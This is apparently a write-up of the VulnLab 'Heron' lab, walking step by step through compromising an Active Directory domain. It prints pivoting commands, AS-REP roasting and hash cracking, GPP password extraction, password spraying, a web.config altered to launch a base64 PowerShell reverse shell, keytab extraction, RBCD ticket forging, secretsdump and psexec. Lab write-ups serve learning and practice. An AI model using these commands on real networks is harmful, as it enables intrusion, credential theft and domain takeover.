VL-Heron

,

Vulnlab Heron: Advanced Network Pivoting and Active Directory Delegation Attacks

In this detailed VulnLab walkthrough, I’ll demonstrate how to compromise the “Heron” domain environment through network pivoting, credential extraction, and advanced delegation attacks. Starting with initial SSH access to a Linux jumpbox, we’ll navigate through a multi-tier network to ultimately achieve domain administrator privileges by exploiting Resource-Based Constrained Delegation (RBCD).
This penetration test showcases sophisticated attack techniques across a hybrid Windows/Linux environment, including network pivoting with Ligolo-NG, web application exploitation, Kerberos authentication abuse, and leveraging group permissions for delegation attacks. The walkthrough highlights critical security misconfigurations often overlooked in complex network environments that penetration testers should be vigilant about.

Initial Access

From the wiki, we obtain initial credentials:

1
pentest:Heron123!

Port scan reveals:

1
2
PORT   STATE SERVICE
22/tcp open  ssh

Network Pivoting with Ligolo-NG

Setting up the tunnel on your attack machine:

1
sudo ip tuntap add user {USER} mode tun ligolo
1
sudo ip link set ligolo up
1
interface_create --name "evil-cha"

On the Linux target:

1
./agent -connect 10.8.5.195:11601 --ignore-cert

After connecting, select the session using the session command:

1
tunnel_start --tun evil-cha

This will add a route only for the Windows machine:

1
interface_add_route --name evil-cha --route HERE/32

Web Enumeration

Port 80 is open, and we discover several users from the Linux machine:

1
svc-web-accounting-d@heron.vl  svc-web-accounting@heron.vl

User list from Linux machine
Additional users found:

1
2
3
wayne.wood@heron.vl
julian.pratt@heron.vl
samuel.davies@heron.vl

User Enumeration and Authentication

We use kerbrute to verify if the discovered users are valid:

1
./kerbrute userenum -d heron.vl --dc 10.10.232.133 ~/Downloads/usernames.txt

Kerbrute output
It returned hashes in the $18$ format, but hashcat uses the $23$ format. We’ll use Impacket’s GetNPUsers to get the correct format:

1
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile ~/Downloads/usernames.txt -dc-ip "10.10.232.133" "heron.vl"/

Hashcat format conversion
Cracking the hash:

1
hashcat hash223.txt /usr/share/wordlists/rockyou.txt

Cracked password
Credentials obtained:

1
samuel.davies : <PASS>

SMB Enumeration

Enumerating SMB shares with the compromised user:

1
netexec smb 10.10.232.133 -u 'samuel.davies' -p '' --shares

SMB shares for Samuel
Found GPP password:

1
netexec smb 10.10.232.133 -u 'samuel.davies' -p '' -M gpp_password

GPP password extraction
Testing credentials against SMB:

1
netexec smb 10.10.232.133 -u usernames.txt -p '<PASS>' --continue-on-success

New account discovered
New credentials discovered:

1
svc-web-accounting-d:<PASS>

Enumerating SMB shares with the new user:

1
netexec smb 10.10.232.133 -u 'svc-web-accounting-d' -p '<PASS>' --shares

We find we have accounting$ READ,WRITE privileges. Within this share, we locate a web.config file:

1
2
3
4
5
6
7
8
9
10
11
12
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\AccountingApp.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Web Application Exploitation

First, we add the accounting vhost to our machine and log in to http://accounting.heron.vl/ using svc-web-accounting-d. We don’t find any useful information, but discover a potential new user: rhys.george@heron.vl.
For our reverse shell, I recommend using the PowerShell #3 Base64 payload from revshells.
We modify the web.config file:

1
2
3
4
5
6
7
8
9
10
11
12
<?xml version="1.0" encoding="utf-8"?>  
<configuration>  
  <location path="." inheritInChildApplications="false">  
    <system.webServer>  
      <handlers>  
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />  
      </handlers>  
      <aspNetCore processPath="powershell" arguments="-e (BASE64 PAYLOAD)" hostingModel="OutOfProcess" />  
    </system.webServer>  
  </location>  
</configuration>  
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Then we create a hoaxshell and paste the base64 output in the arguments:

1
del web.config
1
put web.config

This gives us a shell as svc-web-accounting (set the shell to be on the jumpbox machine and not your attack machine).
A good idea is to use Sliver so you can use your tools to connect to the domain controller.
Ligolo setup:

1
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444

The shell should point at the Linux machine and address 1234, with the listener on our machine on port 4444:

1
nc -lvnp 4444

After setting everything up, refresh the page:
Shell established

Domain Enumeration with BloodHound

1
netexec ldap 10.10.232.133 -u 'svc-web-accounting-d' -p '<PASS>' --bloodhound --dns-server 10.10.232.133 -c ALL --dns-tcp

BloodHound attack path

Credential Hunting as svc-web-accounting

SSH script discovery
Inside the ssh.ps1 file, we find:
SSH root password

1
2
3
4
5
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "<PASS>"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"

With this new user, we have full sudo access:
Full sudo access

Lateral Movement via Linux Machine

As this Linux machine is domain-joined, we can extract krb5.keytab, which contains secrets about the machine account. We use KeyTabExtract to extract those secrets:

1
sudo python3 keytabextract.py /etc/krb5.keytab

Linux machine hash extraction
After password spraying, we get a hit on julian.pratt:

1
netexec smb 10.10.202.197 -u usernames.txt -p '' --continue-on-success

Password spray results
We gain access to his home directory:

1
smbclient //10.10.202.197/home$ -U julian.pratt

Julian's home directory
After retrieving mucjmp.lnk to our local machine and examining it (just run cat mucjmp.lnk and there should be a cleartext string with the autologin credentials), we find credentials for adm_prju:
adm_prju@mucjmp -pw <PASS>

Domain Admin Privilege Escalation

From our BloodHound enumeration, we discovered that adm_prju is in the Admins_T1 group, which has WriteAccountRestrictions over the DC. To exploit this, we need a machine account. Fortunately, we have compromised the Linux machine account.
Now we can abuse Resource-Based Constrained Delegation (RBCD):

1
impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' 'heron.vl/adm_prju:<PASS>'

RBCD exploitation

1
impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :<HASH>

Now we can attempt to dump all secrets through our SOCKS proxy using Impacket’s secretsdump command with our Kerberos ticket. The output may be slow since it has to tunnel through the proxy, so be patient:

1
impacket-secretsdump -k mucdc.heron.vl

We tried using WinRM, but it’s disabled, so we’ll use psexec instead:

1
impacket-psexec heron.vl/'_admin'@heron.vl -hashes :<HASH>

https://api.vulnlab.com/api/v1/share?id=395c9eb2-2c08-4675-9b0e-3bf0bb3c4c44